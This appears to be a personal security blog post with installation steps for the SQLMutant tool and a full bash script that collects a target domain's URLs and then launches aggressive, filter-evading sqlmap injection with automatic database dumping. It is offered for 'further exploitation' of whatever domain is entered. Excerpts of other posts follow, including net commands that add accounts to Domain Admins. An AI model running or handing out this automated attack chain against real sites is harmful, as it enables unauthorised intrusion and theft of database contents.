Skip to main content

Installtion of SQLMutant tool

This tool is perfectly works on ubuntu 24 system. And I found it is not working properly in kali linux 24 version.  

https://github.com/blackhatethicalhacking/SQLMutant/tree/main

This tool need to use along with sqlmap tool. Showing this cheat sheet for kali or debian based system. This tool actually analyze everything and give you the vulnerable url where sql injection is possible. You just need to use then sqlmap to exploit that. 

Prerequisite:

apt install pipx -y (for ubuntu)

pip3 install uro or pipx install uro

pipx ensurepath

pipx completions  (not needed) 

source ~/.bashrc or restart system

If go tool is not installed then run the below two commands first (golang-go) or follow this link to install go (https://mahimfiroj.blogspot.com/2024/12/installing-nuclei-in-kali.html) otherwise skip this step.  

dpkg -l | grep packagename (Using this command you can check package is installed or not)

apt install gccgo-go -y

or

apt install golang-go -y (This one worked for me in ubuntu)

go install github.com/tomnomnom/waybackurls@latest

apt install arjun -y

apt install python3-ratelimit (arjun gives an error if this package is not installed in kali, for ubuntu this one not required)

go install -v github.com/projectdiscovery/httpx/cmd/httpx@latest

apt install jq -y

apt install toilet -y


Make sure sqlmap is installed. It is already installed with kali. In ubuntu sqlmap is not installed. So follow below commands:

apt install sqlmap or snap install sqlmap

sqlmap --update then for interactive question, press y

apt install python-is-python3 -y (This is required for sqlmap in ubuntu)

Then install lolcat:

apt install ruby -y

gem install lolcat

lolcat --version


Now add go to the environment variable otherwise waybackurls command will not work.

Run this on the command shell:

export PATH=$PATH:$(go env GOPATH)/bin

Now in the .profile file, place the below code and then source it. 

export PATH=$PATH:$(go env GOPATH)/bin

source ~/.profile

Once all the prerequisite is done, now it's time to install SQLMutant tool:

apt install git -y (In ubuntu)

git clone https://github.com/blackhatethicalhacking/SQLMutant.git

cd SQLMutant

chmod +x SQLMutant.sh

./SQLMutant.sh

Now this tool will ask you for providing the domain name. Just provide the domain name and wait. After analysis this tool will write it's result in a file and now you need to see that file. Then follow my medium sqlmap link for further exploitation also this tool will give you full sqlmap command. 

Corrected script for kali:

#!/bin/bash

curl --silent "https://raw.githubusercontent.com/blackhatethicalhacking/Subdomain_Bruteforce_bheh/main/ascii.sh" | lolcat

echo ""

# Generate a random Sun Tzu quote for offensive security

quotes=("The supreme art of war is to subdue the enemy without fighting." "All warfare is based on deception." "He who knows when he can fight and when he cannot, will be victorious." "The whole secret lies in confusing the enemy, so that he cannot fathom our real intent." "To win one hundred victories in one hundred battles is not the acme of skill. To subdue the enemy without fighting is the acme of skill.")

random_quote=${quotes[$RANDOM % ${#quotes[@]}]}


# Print the quote

echo "Offensive Security Tip: $random_quote - Sun Tzu" | lolcat

sleep 1

echo "MEANS, IT'S ☕ 1337 ⚡ TIME, 369 ☯ " | lolcat

sleep 1

figlet -w 80 -f small SQLMutant | lolcat

echo ""

echo "[YOUR ARE USING SQLMutant.sh] - (v1.0) CODED BY Chris 'SaintDruG' Abou-Chabké WITH ❤ FOR blackhatethicalhacking.com for Educational Purposes only!" | lolcat

sleep 1


# Check if connected to the internet

tput bold; echo "CHECKING IF YOU ARE CONNECTED TO THE INTERNET!" | lolcat

wget -q --spider https://google.com

if [ $? -ne 0 ]; then

    echo "++++ CONNECT TO THE INTERNET BEFORE RUNNING SQLMutant.sh!" | lolcat

    exit 1

fi

tput bold; echo "++++ CONNECTION FOUND, LET'S GO!" | lolcat


# Get domain from user input

echo "Please enter the domain to scan (e.g. example.com):" | lolcat

read domain


# Create a directory for the output files

echo "Creating directory for output files..." | lolcat

mkdir -p "$domain"

sleep 1


# Get URLs from Wayback Machine and filter using HTTPX

echo "Fetching URLs from Wayback Machine and advanced Regex Filtering using HTTPX..." | lolcat

waybackurls "$domain" | uro | httpx "$domain/all_urls.txt" | grep -iE '(\?|\=|\&)(id|select|update|union|from|where|insert|delete|into|information_schema)' | sort -u > "$domain/sql_ready_urls.txt"

cat "$domain/all_urls.txt" | grep -iE '\?' > "$domain/all_urls_withparams.txt"


# Inform user about the number of URLs found

num_urls=$(wc -l "$domain/all_urls.txt" | awk '{print $1}')

echo "Found $num_urls URLs for $domain before applying the Magic Regex Patterns." | lolcat

sleep 5


# Inform user about the number of URLs ready for SQL injection testing

num_sql_urls=$(wc -l "$domain/all_urls_withparams.txt" | awk '{print $1}')

echo "Found $num_sql_urls URLs ready for SQL injection after applying the Magic Regex Patterns for $domain." | lolcat

sleep 5


# Run Arjun with 20 threads to find more parameters

echo "Finding more parameters using Arjun with 20 threads..." | lolcat

arjun -i "$domain/all_urls.txt" -t 20 --disable-redirects -oJ "$domain/arjun_output.json" 


# Extract URLs with parameters from Arjun's output

if [ -f "$domain/arjun_output.json" ]; then

    jq -r '.[] | select(.params != null) | .url' "$domain/arjun_output.json" > "$domain/arjun_urls.txt"

else

    touch "$domain/arjun_urls.txt"

fi


# Merge URLs from Arjun and Wayback results

echo "Merging Arjun and Wayback URLs..." | lolcat

if [ -f "$domain/arjun_urls.txt" ]; then

    cat "$domain/sql_ready_urls.txt" "$domain/arjun_urls.txt" "$domain/all_urls.txt" "$domain/all_urls_withparams.txt" | uro | sort -u > "$domain/sql_ready_urls2.txt"

else

    cp "$domain/sql_ready_urls.txt" "$domain/sql_ready_urls2.txt"

fi


# Inform user about the new number of URLs ready for SQL injection testing

num_sql_urls2=$(wc -l "$domain/sql_ready_urls2.txt" | awk '{print $1}')

echo "Found $num_sql_urls2 URLs ready for SQL injection testing for $domain after using Arjun and merging results." | lolcat

sleep 5


# Test SQL injection on the list of URLs using SQLMAP

echo "Testing SQL injection on the new list of URLs using SQLMAP with a Tweaked Agressive Approach..." | lolcat

sqlmap -m "$domain/sql_ready_urls2.txt" --risk=3 --smart --hpp --level=5 --random-agent --threads=10 --tamper=apostrophemask,apostrophenullencode,base64encode,between,chardoubleencode,charencode,charunicodeencode,equaltolike,greatest,ifnull2ifisnull,multiplespaces,percentage,randomcase,space2comment,space2plus,space2randomblank,unionalltounion,unmagicquotes --skip-urlencode --string "saintdrugis1337" --forms --dump --dbms=mysql --batch


echo "Make sure to examine the results manually in the location: /root/.local/share/sqlmap/output/" | lolcat

sleep 3


echo -e "\nThank you for using SQLMutant by SaintDruG!" | lolcat


Avi

Comments

Post a Comment

Popular posts from this blog

Install Nessus from docker

Docker installation. Give the below commands one by one. apt install docker-cli or apt install docker.io After the installation is complete, if you are inside wsl then give this command to start docker, because inside wsl systemd (systemctl) does not work: service docker start WSL troubleshooting : If the above command " service docker start " does not work then use below command: dockerd (It may not work if any previous docker process is running. It will show you pid of that process. Use this command to kill that process " kill -9 pid " and run dockerd command again) If " docker ps -a " giving error like " Cannot connect to the Docker daemon at unix:///run/podman/podman.sock. Is the docker daemon running? " This is because you may installed podman-docker package. If you remove the package still you will get this error but you should remove the package. Then issue this command: env | grep -i docker DOCKER_HOST=unix:///run/podman/podman.sock   --...
Post a Comment
Read more

net command cheat sheet

  To see what users present in the system: net user To see local groups in the system: net localgroup To see domain groups. This should be run on a domain controller: net group To see the details of a user along with his/her group membership: net user mahim To see who are the members of a particular group (local machine): net localgroup "administrators"    (These are not case sensitive. You can use administrators or Administrators. Both will give you same result. To see who are the members of a particular group (domain machine): net group "domain admins" Create a local user: net user localuser1 MyP@ssw0rd /add Create a domain user: net user domainuser1 MyP@ssw0rd /add /domain Add the local user to local admin group: net localgroup Administrators localuser1 /add Add the user to domain admin group: net group "Domain Admins" domainuser1 /add /domain Avi
Post a Comment
Read more